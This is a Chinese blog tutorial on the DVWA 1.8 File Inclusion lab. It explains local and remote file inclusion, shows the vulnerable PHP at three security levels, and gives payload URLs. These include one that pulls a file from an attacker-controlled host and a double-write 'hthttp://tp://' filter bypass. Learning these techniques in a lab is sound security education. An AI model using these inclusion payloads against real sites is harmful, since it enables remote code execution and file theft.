DVWA1.8全级别之文件包含

最新推荐文章于 2023-01-18 20:21:19 发布
最新推荐文章于 2023-01-18 20:21:19 发布
阅读量120 收藏
点赞数 1
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46938584/article/details/109168992
版权

File Inclusion

File Inclusion,意思是文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。文件包含漏洞分为本地文件包含漏洞与远程文件包含漏洞,远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项(选项开启之后,服务器允许包含一个远程的文件)。

LOW

服务器端核心代码

 <?php

    $file = $_GET['page']; //The page we wish to display 

?>

可以看到,服务器端对page参数没有做任何的过滤跟检查。需要特别说明的是,服务器包含文件时,不管文件后缀是否是php,都会尝试当做php文件执行,如果文件内容确为php,则会正常执行并返回结果,如果不是,则会原封不动地打印文件内容,所以文件包含漏洞常常会导致任意文件读取与任意命令执行。

漏洞利用

1.本地文件包含
2.远程文件包含
在kali上开启apache2服务器,上传一个文件,然后构造url:
http://192.168.153.130/dvwa/vulnerabilities/fi/page=http://192.168.5.12/xxx.txt
为了增加隐蔽性,可以进行url编码

Medium

服务器端核心代码

 <?php

    $file = $_GET['page']; // The page we wish to display 

    // Bad input validation
    $file = str_replace("http://", "", $file);
    $file = str_replace("https://", "", $file);      
    $file=str_replace(array("../","..\""),"",$file);  


?>

可以看到,Medium级别的代码增加了str_replace函数,对page参数进行了一定的处理,将”http:// ”、”https://”、” …/”、”…\”替换为空字符,即删除。

漏洞利用

使用str_replace函数是极其不安全的,因为可以使用双写绕过替换规则。
例如page=hthttp://tp://192.168.5.12/phpinfo.txt时,str_replace函数会将http://删除,于是page=http://192.168.5.12/phpinfo.txt,成功执行远程命令。
同时,因为替换的只是“…/”、“…\”,所以对采用绝对路径的方式包含文件是不会受到任何限制的。
同样是两种包含方式,只要利用上面的绕过规则即可。

High

服务器端核心代码

 <?php
        
    $file = $_GET['page']; //The page we wish to display 

    // Only allow include.php
    if ( $file != "include.php" ) {
        echo "ERROR: File not found!";
        exit;
    }
        
?>

可以看到,high级别的代码使用了白名单机制进行防护,简单粗暴,page参数必须为“include.php”,彻底杜绝了文件包含漏洞。

jnu_issc_zrx
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA网络安靶场搭建与练习 附攻略和在线版
01-02
网络安靶场搭建与练习附攻略和在线版
DVWA1.8级别之CSRF
weixin_46938584的博客
10-10 195
DVWA级别之CSRF CSRF(Cross-site request forgery) CSRF,称Cross-site request forgery,翻译过来就是跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的区别就在于,CSRF并没有盗取cookie而是直接利用。 下面对3种级别的代码进行
DVWA1.8级别之Insecure CAPTCHA
weixin_46938584的博客
11-29 162
DVWA级别之Insecure CAPTCHA Insecure CAPTCHA 不安的验证流程,这块主要是验证流程出现了逻辑漏洞。 reCAPTCHA验证流程 这一模块的验证码使用的是Google提供reCAPTCHA服务,下图是验证的具体流程。 服务器通过调用recaptcha_check_answer函数检查用户输入的正确性。 recaptcha_check_answer($privkey,$remoteip, $challenge,$response) 参数$privkey是服务器申请的pri
DVWA1.8级别之SQL Injection
weixin_46938584的博客
11-01 247
DVWA级别之SQL Injection SQL Injection 即SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被拖库,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。 手工注入思路 自动化的注入神器sqlmap固然好用,但还是要掌握一些手工注入的思路,下面简要介绍手工注入(非盲注)的步骤。 1.判断是否存在注入,注入是字符型还是数字型 2.猜解SQL查询语句中的字段数 3.确定显
漏洞复现篇——文件包含漏洞(DVWA靶场---File Inclusion【低中高级绕过】)
爱国小白帽
02-19 3878
实验环境: PHPstudy DVWA靶场 菜刀 环境搭建 1、将DVWA Security級別换成low 2、打开php的配置文件,搜索allow_url_include,把off换成on,然后重启 模拟实验 本地文件包含(LFI) 1、点击File Inclusion中的file1.php 2、在图示位置输入C:\Windows\System32\drivers\etc\hosts...
DVWA靶场——File Inclusion(文件包含漏洞)
qq_74806534的博客
01-18 6495
程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含File Inclusion,文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
漏洞演示系统DVWA(Damn Vulnerable Web Application) V1.8渗透测试攻略
Phoebe201415的博客
07-15 833
漏洞演示系统DVWA(Damn Vulnerable Web Application) V1.8攻略 测试环境: 操作系统:Windows 8.1 、Windows 7 运行时:.Net Framework 3.5 PHP+MySQL集成测试环境:XAMPP V3.2.1 首先,从http://www.dvwa.co.uk/ 下载DVWA,并将文件释放到c:\xampp\...
新手指南:DVWA 1.9 级别教程 PDF
08-18
新手指南:DVWA 1.9 级别教程 PDF格式
DVWA级别教程
10-26
DVWA级别教程 通关秘籍 练手的同学可以下载 epub文件 适合手机平板看
DVWA-DVWA渗透测试平台文件
最新发布
03-07
DVWA称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。...帮助web开发人员理解web应用保护的过程,还可以在课堂中为... DVWA现在已包含在流行的渗透测试Linux发行版中,例如Samurai的Web测试框架等。
漏洞演示系统DVWA渗透测试攻略
07-15
漏洞演示系统DVWA(Damn Vulnerable Web Application) V1.8渗透测试攻略。
DVWA漏洞测试平台分析.v1.0.zip
03-12
DVWA漏洞测试平台分析.v1.0
win10 DVWA下载安装配置图文教程详解(新手学渗透)
09-29
主要介绍了win10 DVWA下载安装配置教程详细,本文通过文字图文相结合的形式给大家介绍的非常详细,具有一定的参考借鉴价值 ,需要的朋友可以参考下
新手指南:DVWA 1.9 级别教程
01-03
新手指南:DVWA 1.9 级别教程
DVWA级别中文渗透教程和渗透环境,最强大没有之一
11-26
DVWA级别中文渗透教程,最强大没有之一.pdf》提供了详尽的指导,包括每个漏洞的介绍、利用方法以及如何修复。这使得中文读者能够更轻松地理解并学习Web安概念。 6. **DVWA-master.zip** 这个文件包含DVWA...
DVWA平台v1.8-反射型XSS(low级别)
andiao1218的博客
12-14 165
源代码 <?php if(!array_key_exists ("name", $_GET) || $_GET['name'] == NULL || $_GET['name'] == ''){ $isempty = true; } else { echo '<pre>'; echo '你好' . $_GE...
DVWA平台v1.8-SQL注入(low级别)
andiao1218的博客
11-26 427
代码 <?php if(isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; ...
DVWA--javascript
weixin_45038413的博客
05-09 1902
Low 等级 查看源码,在前台生成了一个token,用的是md5加密。 输入success 在控制台输入 generate_token(); Medium 等级 输入 success 在控制台中,输入do_elsesomething(“XX”) High 等级 查看源码,发现这里的js代码经过混淆 使用http://deobfuscatejavascript.com解除混淆 关键代码...
DVWA 1.9 通关秘籍
dfdhxb995397的博客
09-21 328
DVWA 1.9 通关秘籍 本文来源:i春秋社区-分享你的技术,为安加点温度 DVWA (Dam Vulnerable Web Application) DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安漏洞。本次我们测试使用的是Version 1.9 (Release d...
DVWA实验:文件上传与包含漏洞分析
"网络安实验,涉及文件上传与文件包含漏洞,使用DVWA测试环境,通过Kali Linux进行攻击机操作。" 在网络安领域,文件上传与文件包含是两种常见的Web应用程序安漏洞,它们允许攻击者利用系统弱点来执行恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值